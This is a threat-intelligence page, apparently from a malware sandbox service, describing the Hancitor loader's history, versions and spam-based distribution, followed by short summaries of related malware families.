Hancitor, sometimes called Tordal and Chanitor is a loader designed to install other malware on the victim’s PC – most often it’s either Pony, Vawtrak, or DELoader. The malware has been around since 2014 and it is distributed to other users as a service by the original creators.

  • Type
  • Origin
  • First seen
    1 January, 2014
  • Last seen
    20 November, 2019
Also known as
Global rank
Week rank
Month rank

What is Hancitor malware?

Hancitor, sometimes called Tordal and Chanitor is a loader designed to install other malware on the victim’s PC – most often it’s either Pony, Vawtrak, or DELoader. The malware has been around since 2014 and it is distributed to other users as a service by the original creators.

This malware can’t be considered dangerous since even Microsoft's built-in antivirus Windows Defender can detect it. On top of that, being distributed in email spam campaigns, in a lot of cases emails don’t even reach their targets, being intercepted by spam filters. In essence, the only people truly in danger of getting infected by Hancitor, are those who still utilize older Windows version like Windows seven or earlier and who either don’t have or disabled their antivirus software. Curiously, despite such a limited “target audience”, Hancitor creators continue to update this malware and it is still very active to this day.

General description of the Hancitor Trojan

Creators of Hancitor provide their loader as a service to other criminals, helping to install various malware on the target PCs. The people behind Hancitor are extremely active and organized. Some researchers suspect that they work full business weeks since the surge of Hancitor attacks usually takes place on business days and falls off on the weekends, which suggests that the hackers responsible have a work structure and a schedule.

Despite that, Hancitor has not changed very much since 2016 and to this day relies on very simple execution and evasion techniques which makes it’s detection and prevention relatively easy, especially for corporate targets with adequate levels of cybersecurity.

The 2016 version of the malware had 66 functions and had the size of 20 480 bytes while the 2018 version is made up of 51 functions that amount to the size of 20 992 bytes. One of the main differences between the versions is the lack of connectivity check functionality in the 2018 iteration. As such, the older iteration of Hancitor would try to connect to Google.com during execution to check for connections whereas the never iteration fully omits this step. The newer version also makes use of the RC4 encryption and contains some updated commands.

Not unlike other malware, Hancitor Trojan uses several attack vectors to maximize the success rate. Hancitor creators have exploited uncommon API abuse and PowerShell methods among others to ensure the successful infection.

Over the last two years, over 80 variations of Hancitor were detected in the wild. Usually, a new variation would be created simply to define a new variable for a different campaign, while in other times the basic functions of the loader were completely changed and rewritten. However, such instances were rather rare and highly rewritten samples didn’t stick around for long. Some researchers believe that in such instances the malware authors were testing different approaches and keeping track of the infection rate to determine what changes should remain and which innovations should go.

Hancitor malware analysis

A video recorded on the ANY.RUN malware hunting service displays the execution process of Hancitor.

process graph hancitor execution

Figure 1: A visual graph of Hancitor execution processes generated by ANY.RUN

text report of the hancitor malware analysis

Figure 2: A customizable text report shown here was generated in the ANY.RUN malware huting service

Hancitor execution process

Because of its main purpose, the execution of Hancitor doesn't look that impressive. Since the most common vector of attack to infect users' devices is malicious spam campaigns, Hancitor mostly gets into devices with Microsoft Office files. Once the user downloads and opens the malicious file, the malware either use the lure to trick the victim into enabling macros or uses an exploit. After that Hancitor will be either downloaded from the C2 server or dropped from an Office file. Next step is its execution during which the malware downloads the main payload, usually a trojan such as Pony, Vawtrak, or DELoader.

Distribution of Hancitor

Hancitor is usually distributed in malspam campaigns as a malicious Microsoft Office file attachment. However, since most organizations started improving their cybersecurity measures some campaigns distributing Hancitor contain a link pointing at the website from where this loader is downloaded.

In the case of distribution using .DOC attachments, the user must first download the file and then activate macros, ignoring multiple security warning. Malware authors use lures to trick users into doing that. Some phishing emails contain an invoice or a fake payment related document, trying to make the user download it. In addition, attackers provide instruction to enable macros. If the user complies, malicious macros will download Hancitor or it will be dropped from the document.

In some malspam campaigns, Hancitor was delivered to victims with .RTF documents which used an exploit to run the PowerShell command which downloaded the loader to the computer.

How to get more info from the analysis of Hancitor malware using ANY.RUN?

Analysts can take a look at what modules malware uses. Choose the process by clicking on it in the process tree of the task then click on the "More info" button. In "Advanced details of process" window switch to the "Registry changes" tab and take a closer look.

modules loaded by hancitor Figure 3: Modules loaded by Hancitor


Despite its simplicity and vulnerability to even simple countermeasures, Hancitor Trojan somehow remains to be an active malware which continues to target it is limited demographic, evidently with good success rate. The authors of this loader are extremely active and regularly come up with new iterations of Hancitor.

Researchers can take advantage of malware hunting services such as ANY.RUN to take Hancitor samples apart and study this loader in-depth.


IP addresses


Adwind screenshot
adwind trojan
Adwind RAT, sometimes also called Unrecom, Sockrat, Frutas, jRat and JSocket is a remote access trojan available as MaaS ( Malware-As-A-Service ). Adwind can collect user and system data, control the webcam of the infected machine, capture screenshots, install and run other malicious programs, log keystrokes, steal web browser passwords and more.
Read More
AgentTesla screenshot
agenttesla trojan rat stealer
Agent Tesla is a password stealer spyware that has been around since 2014. The malware can be used by attackers to spy on victims, allowing them to see everything that has been typed in supported programs and web-browsers.
Read More
Azorult screenshot
azorult trojan rat
AZORult is an information stealer malware that is targeted at stealing credentials and accounts. Updated multiple times over the years, AZORult continues to be an active concern for the users, stealing information such as banking passwords, credit card details, browser histories, and even cryptocurrency.
Read More
Danabot screenshot
danabot trojan stealer
Danabot is a banking trojan that was spotted in the wild in 2018. Danabot differs from competing Trojans thanks to its robust delivery system and modular design. Since its first appearance, Danabot has obtained high popularity among cybercriminals and became an active threat in multiple regions of the world.
Read More
Dridex screenshot
dridex trojan banker
Dridex is one of the most technologically advanced banking trojans currently active. The primary target of this malware is stealing banking credentials from its victims. Dridex has been around since 2014 and has benefited from very consistent updates that helped the malware evolve and become more and more capable.
Read More
Emotet screenshot
emotet trojan loader banker
Emotet is an extremely sophisticated and destructive banking Trojan used to download and install other malware. First recorded in 2014, Emotet has gained advanced capabilities over the course of its lifetime. Today Emotet is targeting governments, corporations, small businesses and individuals, focusing on Europe, America, and Canada.
Read More